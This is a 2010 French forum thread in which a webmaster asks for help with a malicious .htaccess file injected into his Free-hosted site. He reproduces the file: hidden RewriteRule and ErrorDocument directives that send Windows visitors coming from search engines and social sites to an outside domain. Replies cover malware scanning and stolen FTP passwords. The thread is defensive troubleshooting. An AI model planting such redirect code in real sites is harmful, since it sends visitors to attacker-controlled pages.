Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1547 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  Piratage - Page perso Free - .htaccess

 
 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Piratage - Page perso Free - .htaccess

n°1995201
Cocodu670
Posté le 21-05-2010 à 19:43:44  profilanswer
 

Bonjour,
 
je tiens un site web hébergé par Free sur les pages perso.
Depuis une semaine je pense m'être fait "hacké" deux fois. Je vous explique la situation :
 
Je retrouve dans presque tous mes dossier un .htaccess qui contient le code suivant :  
 

Code :
  1. #
  2. # DO NOT EDIT THIS FILE
  7. ErrorDocument 500 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=0
  8. ErrorDocument 502 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=2
  9. ErrorDocument 403 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=3
  11. RewriteEngine On
  13. RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
  14. RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
  15. RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
  16. RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
  17. RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
  18. RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
  19. RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
  20. RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
  21. RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
  22. RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
  23. RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
  24. RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
  25. RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
  26. RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
  27. RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
  28. RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
  29. RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
  30. RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
  31. RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
  32. RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
  33. RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
  34. RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
  35. RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
  36. RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
  37. RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
  38. RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
  39. RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
  40. RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
  41. RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
  42. RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
  43. RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
  44. RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
  45. RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
  46. RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
  47. RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
  48. RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
  49. RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
  50. RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
  51. RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
  52. RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
  53. RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
  54. RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
  55. RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
  56. RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]
  58. RewriteCond %{HTTP_USER_AGENT} .*Windows.*
  59. RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]
  61. RewriteCond %{REQUEST_FILENAME} !-f
  62. RewriteCond %{REQUEST_FILENAME} !-d
  63. RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
  64. RewriteCond %{HTTP_USER_AGENT} .*Windows.*
  65. RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]

 
 
 
Un espace important est laissé entre le texte "DO NOT EDIT THIS FILE" et le code qui suit. Ce code est donc clairement mailveillant.
 
Alors deux questions :  
- que fait ce programme à part désactiver l'accès de mon site aux visiteurs ?
- d'où viens la faille ? En effet, j'enregistre sur base de données toutes les pages qui sont chargée et je ne constate aucune activité suspecte.
 
Note : l'accès de mon site est normalement protégé par mot de passe (.htaccess). Je dois donc le refaire à chaque fois puisqu'il est écrasé.
 
 
Voilà, si vous avez des idées et des suggestions je suis à votre écoute. Merci de m'aider.
 
Merci,
Corentin

mood
Publicité
Posté le 21-05-2010 à 19:43:44  profilanswer
 

n°1995209
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:10:50  profilanswer
 

tu voudrais pas télécharger hijackthis et poster le log obtenu.  
Je suis pret à parier que ton propre pc est un nid à virus


---------------
Blablaté par Harko
n°1995211
Cocodu670
Posté le 21-05-2010 à 20:15:53  profilanswer
 

Merci,
 
C'est bien possible que j'ai des virus sur mon poste... Voici le log d'hijackthis :
 

Code :
  1. Logfile of Trend Micro HijackThis v2.0.2
  2. Scan saved at 20:14:59, on 21/05/2010
  3. Platform: Windows XP SP2 (WinNT 5.01.2600)
  4. MSIE: Internet Explorer v8.00 (8.00.6001.18702)
  5. Boot mode: Normal
  7. Running processes:
  8. C:\WINDOWS\System32\smss.exe
  9. C:\WINDOWS\system32\winlogon.exe
  10. C:\WINDOWS\system32\services.exe
  11. C:\WINDOWS\system32\lsass.exe
  12. C:\WINDOWS\system32\svchost.exe
  13. C:\WINDOWS\System32\svchost.exe
  14. C:\WINDOWS\system32\spoolsv.exe
  15. C:\WINDOWS\Explorer.EXE
  16. C:\WINDOWS\RTHDCPL.EXE
  17. C:\WINDOWS\system32\igfxtray.exe
  18. C:\WINDOWS\system32\hkcmd.exe
  19. C:\WINDOWS\system32\igfxpers.exe
  20. C:\WINDOWS\system32\rundll32.exe
  21. C:\WINDOWS\system32\igfxsrvc.exe
  22. C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe
  23. C:\WINDOWS\system32\ctfmon.exe
  24. C:\Program Files\SpeedswitchXP\SpeedswitchXP.exe
  25. C:\Program Files\McAfee Security Scan\2.0.181\SSScheduler.exe
  26. C:\Program Files\Datacolor\Spyder3Pro\Utility\Spyder3Utility.exe
  27. C:\Program Files\teraterm\Collector\Collector.exe
  28. C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
  29. C:\Program Files\teraterm\ttpmenu.exe
  30. C:\Program Files\Mozilla Firefox\firefox.exe
  31. C:\DOCUME~1\ADMINI~1.ORD\LOCALS~1\Temp\RtkBtMnt.exe
  32. C:\WINDOWS\System32\svchost.exe
  33. C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  34. C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  35. C:\Program Files\Java\jre6\bin\jqs.exe
  36. C:\Program Files\ptc\flexlm\i486_nt\obj\ptc_d.exe
  37. C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\QueMgr.exe
  38. C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\RmtMgr.exe
  39. C:\WINDOWS\system32\HPZipm12.exe
  40. C:\WINDOWS\system32\svchost.exe
  41. C:\Program Files\Notepad++\notepad++.exe
  42. C:\Documents and Settings\Administrateur.ORDI-XPSP2\Mes documents\Téléchargements\HiJackThis.exe
  44. R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
  45. R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.fr
  46. R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
  47. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
  48. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
  49. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
  50. R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
  51. R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkID=82825
  52. R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
  53. R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Favoris
  54. O1 - Hosts: ::1 localhost
  55. O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
  56. O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
  57. O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
  58. O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
  59. O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
  60. O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
  61. O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
  62. O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
  63. O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Fichiers communs\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
  64. O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
  65. O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe"
  66. O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
  67. O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
  68. O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
  69. O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
  70. O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
  71. O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe"
  72. O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
  73. O4 - HKCU\..\Run: [SpeedswitchXP] C:\Program Files\SpeedswitchXP\SpeedswitchXP.exe
  74. O4 - Startup: Collector.lnk = C:\Program Files\teraterm\Collector\Collector.exe
  75. O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
  76. O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
  77. O4 - Startup: TeraTerm Menu.lnk = C:\Program Files\teraterm\ttpmenu.exe
  78. O4 - Global Startup: McAfee Security Scan Plus.lnk = ?
  79. O4 - Global Startup: Spyder3Utility.lnk = C:\Program Files\Datacolor\Spyder3Pro\Utility\Spyder3Utility.exe
  80. O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
  81. O9 - Extra button: Envoyer à OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
  82. O9 - Extra 'Tools' menuitem: &Envoyer à OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
  83. O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
  84. O23 - Service: dopewars server (dopewars-server) - Unknown owner - C:\Program Files\dopewars-1.5.12\dopewars.exe
  85. O23 - Service: FLEXlm server for PTC - Macrovision Corporation - C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  86. O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
  87. O23 - Service: Service Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
  88. O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
  89. O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
  90. O23 - Service: Ma-Config Service (maconfservice) - CybelSoft - C:\Program Files\ma-config.com\maconfservice.exe
  91. O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe
  92. O23 - Service: MSCQueMgr - Unknown owner - C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\QueMgr.exe
  93. O23 - Service: MSCRmtMgr - Unknown owner - C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\RmtMgr.exe
  94. O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
  95. O23 - Service: wampapache - Apache Software Foundation - c:\wamp\bin\apache\apache2.2.11\bin\httpd.exe
  96. O23 - Service: wampmysqld - Unknown owner - c:\wamp\bin\mysql\mysql5.1.36\bin\mysqld.exe
  98. --
  99. End of file - 7271 bytes

n°1995214
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:30:18  profilanswer
 

faut virer ce services :  
O23 - Service: dopewars server (dopewars-server) - Unknown owner - C:\Program Files\dopewars-1.5.12\dopewars.exe


---------------
Blablaté par Harko
n°1995215
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:31:38  profilanswer
 

ya quoi comme site sur ton ftp ?  
tu utilises quoi pour ton site ? nukedclan ?


---------------
Blablaté par Harko
n°1995218
Cocodu670
Posté le 21-05-2010 à 20:39:05  profilanswer
 

Merci de votre aide.
 
Dopewars est un tout petit jeu du style DrugWars (que vous devez connaitre si vous jouiez avec votre calculatrice au lycée). Mais je vais le virer.
 
 
Je me suis renseigné sur un forum de OVH (hébergeur) : il semble que ce type d'attaque soit dû à un trojan sur l'ordinateur du webmaster qui choppe les mots de passe FTP. Je vais donc changer le mot de passe de mon FTP (à partir d'un poste sûr de mon école) et je ferai désormais les mises à jour depuis mon école.
 
Merci encore de votre aide et si vous avez des infos je suis toujours preneur.
 
PS :
ya quoi comme site sur ton ftp ?  
tu utilises quoi pour ton site ? nukedclan ?
 
==> Je ne comprend pas ce que tu veux dire. J'utilise juste un site que j'ai moi-même tapé en php, donc je suppose qu'il peut y avoir des failles de type injection et include bien j'ai fait très attention.
 
Corentin

n°1995221
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:55:08  profilanswer
 

tu voudrais pas passer un coup de adaware et spybot ?  
tu les trouveras sur ninite.com
 
ca fera déjà un peu de nettoyage. Mais sinon reinstalle ta machine s'il faut en arriver là

Message cité 1 fois

---------------
Blablaté par Harko
n°1995224
Cocodu670
Posté le 21-05-2010 à 21:09:04  profilanswer
 

gatsu35 a écrit :

tu voudrais pas passer un coup de adaware et spybot ?  
tu les trouveras sur ninite.com
 
ca fera déjà un peu de nettoyage. Mais sinon reinstalle ta machine s'il faut en arriver là


 
 
Merci, je peux pas refaire ma machine en ce moment mais je vais installer adaware et spybot. A bientot !
 
 
Corentin


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  Piratage - Page perso Free - .htaccess

 

Sujets relatifs
[Résolu] Changer couleur du lien de la page activereponse optenue sujet terminer
Formulaire PHP, retour sur ma page d'origine[résolu] modification du contenu d'une page en fonction d'un paramètre
"Capturer" des données dynamiques d'une page web ?VB : Insérer le contenu d'un textbox dans une page web
[iText] numero de pageRécupérer lien de page html avec php
[API google Maps javascript] affichage page html dans une infobulleintegrer mumble viewer sur sa page .xml
Plus de sujets relatifs à : Piratage - Page perso Free - .htaccess

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.101 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR